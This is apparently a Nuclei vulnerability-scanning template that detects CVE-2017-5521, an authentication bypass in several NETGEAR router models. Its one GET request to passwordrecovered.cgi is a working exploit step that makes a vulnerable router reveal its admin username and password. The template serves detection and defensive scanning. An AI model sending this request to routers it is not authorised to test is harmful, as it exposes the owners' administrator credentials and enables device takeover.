id: CVE-2017-5521

info:
  name: NETGEAR Routers - Authentication Bypass
  author: princechaddha
  severity: high
  description: |
    NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
    - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
    - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
  tags: cve,cve2017,auth-bypass,netgear,router,kev
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and

      - type: status
        status:
          - 200